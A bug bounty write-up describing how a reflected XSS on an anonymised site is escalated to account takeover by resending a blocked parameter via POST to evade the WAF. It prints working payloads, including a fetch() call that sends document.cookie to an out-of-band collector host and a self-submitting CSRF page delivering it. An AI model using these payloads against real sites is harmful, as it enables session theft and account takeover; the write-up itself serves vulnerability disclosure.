From RXSS to ATO: Bypassing WAF with a Simple POST Trick

🛡️ Vulnerability Summary:

Severity: Critical

Vulnerability Type: Cross-Site Scripting — Reflected (RXSS)

Impact: Full account takeover of any user

Bounty: $$$$

💬 Description:

While testing on a private program, lets name it redacted.com , i discovered a Reflected Cross-site scripting but the WAF was extremely strict, i couldn't do anything at all, except for unique payloads like alert(); and HTMLi payloads, even alert(); payloads were being blocked, the only payload that i was able to get to work was:

https://redacted.com/my-account?LastName=hiii" onbeforeinput="alert()

The WAF was so strict, but one of the things that i noticed while testing this web application is that their WAF was kinda different, it shows their Logo with “Blocked”, its like their own built-in WAF, so i was thinking of a way to bypass this WAF, and i got this idea of changing the request from GET to POST with the same parameter but in the body of the POST Request:

POST /my-account HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

LastName=hiii%22%20onbeforeinput%3D%22alert()%22

and the XSS still worked, then i changed the payload to another payload that was getting blocked when sending it via a GET Request, and the WAF never blocked me!, The biggest Goldmine lol, i then changed the payload to this:

POST /my-account HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

LastName=hiii" onbeforeinput="fetch(`fetch(`https://collab.oast.site?c=`+document.cookie)//

And it worked:

I then made a CSRF PoC and sent it to my other browser ( roleplaying it as a victim ):

<!DOCTYPE html>
<html>
  <head><title>PoC</title></head>
  <body>
    <form action="https://www.redacted.com/my-account?status=find" method="POST">
      <input type="hidden" name="LastName" value='" onbeforeinput=fetch(`https://19bhju56jldflt1iyqrwetlkqjqx2tpmb.oast.site?c=`+document.cookie)//'>
      <input type="hidden" name="ConfirmationNumber" value="[None-of-ur-business]">
      <input type="submit">
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

And it worked!, one of the best WAFs that i have ever seen LOL

After reporting this issue i was awarded with a $$$$ Bounty: